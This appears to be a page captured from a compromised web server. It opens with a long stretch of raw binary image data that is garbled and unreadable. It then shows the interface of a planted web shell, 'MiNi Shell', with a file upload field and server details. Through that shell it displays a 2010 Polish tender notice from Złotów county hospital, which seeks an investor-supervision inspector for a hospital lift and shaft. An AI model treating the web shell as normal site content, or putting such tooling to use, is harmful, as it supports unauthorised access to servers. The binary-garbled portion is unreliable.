JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100108/5513-N-2010.html

<p class="kh_header"><b>Złotów: Pełnienie funkcji inspektora nadzoru inwestorskiego
przy realizacji zadania -Dostawa, montaż oraz uruchomienie dźwigu szpitalnego wraz z budową szybu .</b><br>
<b>Numer ogłoszenia: 5513 - 2010; data zamieszczenia: 08.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Powiatowy im. A. Sokołowskiego , ul. Szpitalna 28, 77-400 Złotów, woj. wielkopolskie, tel. 067 2632233 w. 420, faks 067 2635878.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego
przy realizacji zadania -Dostawa, montaż oraz uruchomienie dźwigu szpitalnego wraz z budową szybu ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Oznaczenie wg Wspólnego Słownika Zamówień ( CPV) 71520000-9

2. Przedmiotem Zamówienia jest pełnienie przez Wykonawcę obowiązków inspektora 
         nadzoru inwestorskiego  zgodnie z art. 25 i 26 ustawy Prawo budowlane przy realizacji 
         zadania pn. -Dostawa, montaż oraz uruchomienie dźwigu szpitalnego wraz z budową szybu.

3.  Do zadań inspektora nadzoru inwestorskiego należy pełny zakres czynności   
         określonych w art. .25 i 26  ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz.U. 
          z 2006 r  Nr 156 poz. 1118 z póżn. zm). tj. w szczególności:
          - reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej 
            realizacji z projektem i pozwoleniem na budowę, przepisami prawa oraz zasadami
            wiedzy technicznej
          - sprawdzanie jakości wykonywanych robót i wbudowanych materiałów, a w 
            szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i 
             niedopuszczalnych do stosowania w budownictwie
          - sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,
          - uczestniczenie w próbach i odbiorach technicznych
          - przygotowanie i udział w czynnościach odbioru gotowego obiektu
          - potwierdzanie faktycznie wykonanych robót oraz usunięcia wad
          - kontrolowanie rozliczeń budowy
          Po zakończeniu robót budowlanych do obowiązku   Inspektora nadzoru  inwestorskiego 
          będzie należało: 
         - finalizacja zadań wynikających z zakończenia budowy
         - dokonywanie nadzoru nad robotami związanymi z usuwaniem wad i usterek
         - odbiór wykonanych robót związanych z usunięciem wad i usterek
         - współpraca z Zamawiającym dotycząca negocjacji w sprawie roszczeń i sporów
         - udział w przeglądach i odbiorach pogwarancyjnych

4. Zakres robót objętych nadzorem obejmuje : Dostawa, montaż oraz uruchomienie dźwigu szpitalnego wraz z budową szybu.   


5. Wartość robót budowlanych według kosztorysu inwestorskiego wynosi: 302.000,00   zł
  brutto   ( słownie : trzysta dwa tysiące zł brutto)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia zgodnie z art.22 ust. 1 ustawy Prawo zamówień publicznych 
      mogą ubiegać się Wykonawcy, którzy: 

  1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień;
  1.2.	posiadają niezbędną wiedzę i doświadczenie oraz  dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób  zdolnych do wykonania zamówienia
     1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
    1.4.  nie podlegają wykluczeniu z postępowania, o udzielenie zamówienia zgodnie z art. 
                  24 ustawy Prawo  zamówień publicznych

2. Zamawiający ustala następujące, szczegółowe warunki udziału w postępowaniu:
       O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy spełniają następujące
       warunki:
     2.1. Dysponują osobą  posiadającą uprawnienia budowlane do wykonywania 
                samodzielnych funkcji   technicznych  budownictwie  w   specjalności drogowej bez 
                ograniczeń i  legitymującą się min. 3  letnim  doświadczeniem  zawodowym ( 3 lata 
                od daty  otrzymania uprawnień w   wymaganej  specjalności), należącą do 
               właściwej izby samorządu zawodowego.
     2.2. Posiadają doświadczenie w zakresie sprawowania obowiązków inspektora nadzoru 
                inwestorskiego - w ciągu ostatnich trzech lat, a jeżeli okres działalności jest krótszy- w tym okresie,  pełnili funkcję inspektora nadzoru 
                inwestorskiego nad co najmniej jedną robotą budowlaną - potwierdzoną 
               dokumentem stwierdzającym, że usługa została wykonana należycie.

3. Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu nastąpi wg 
       formuły -spełnia-nie spełnia-, w oparciu o informacje zawarte w dokumentach i 
       oświadczenia wymaganych przez Zamawiającego i wyszczególnionych w SIWZ, 
       dołączonych do oferty.

4. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi 
         kryteriami:


Cena 100%

                              najniższa zaoferowana cena brutto
ilość punktów =                                                                         x 10x 100%
                              cena brutto w badanej ofercie


5. Każda oferta będzie podlegała indywidualnej ocenie przez każdego członka komisji 
         przetargowej. Ilość punktów przyznana ofercie będzie sumą punktów od 
         poszczególnych członków komisji przetargowej.

6. Zamawiający powierzy zamówienie Wykonawcy, który spełniając warunki określone w 
         pkt. 8 SIWZ , otrzyma najwyższą ilość punktów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca zobowiązany jest do złożenia następujących dokumentów:
    1.1.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
               ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 m-cy przed 
                upływem terminu składania ofert
 1.2. Oświadczenie o spełnieniu warunków zawartych w art.22 ust.1 pkt. 1 -3ustawy 
                Prawo zamówień publicznych - załącznik nr 2
   1.3. Oświadczenie o spełnieniu warunków zawartych w art.22 ust.1 pkt.4 ustawy 
               Prawo zamówień publicznych - załącznik nr 3
  1.4.  Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca ( załącznik 
               nr 4) wraz z załączonymi kserokopiami uprawnień budowlanych w wymaganej 
               specjalności, aktualnych zaświadczeń o przynależności do właściwej izby 
               samorządu zawodowego wraz z potwierdzeniem posiadania wymaganego 
               ubezpieczenia od odpowiedzialności cywilnej. Jeżeli Wykonawca w załączniku 
               nr 4  wykazał osobę,osoby, którymi będzie dysponował do oferty należy 
              dołączyć  pisemne zobowiązanie tych podmiotów do udostępnienia osób 
              zdolnych do  wykonania zamówienia.
   1.5. Wykaz wykonanej min. jednej usługi nadzoru inwestorskiego zrealizowanej przez wykonawcę w okresie  ostatnich trzech lat 
              przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres 
              prowadzenia działalności jest krótszy- w tym okresie ( załącznik nr 5) wraz z 
              dokumentami potwierdzającymi, że usługa została  wykonana należycie.

2. Ponadto Wykonawca jest zobowiązany dołączyć do oferty:
      2.1. Formularz oferty ( wzór załącznik nr 1)
      2.2. W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia do 
                 oferty należy dołączyć dokument ustanawiający pełnomocnika do reprezentowania 
                 Wykonawców w postępowaniu i zawarcia umowy zgodnie z art. 23.ust.1 i 2 
                 ustawy   Prawo zamówień publicznych.
3. W przypadku podmiotów składających ofertę wspólną warunki udziału w postępowaniu
      opisane w pkt. 2.1. i 2.2. muszą być spełnione łącznie przez składających wspólną 
      ofertę.
4.   Kserokopie dokumentów muszą być podpisane -za zgodność z oryginałem-przez 
          osobę upoważnioną do podpisywania oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.zlotow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul.Szpitalna 28, 77-400 ZŁOTÓW, pokój 110.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2010 godzina 10:00, miejsce: Sekretariat siedziby zamawiającego : pokój  105 ul. Szpitalna 28 , 77-400 ZŁOTÓW.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com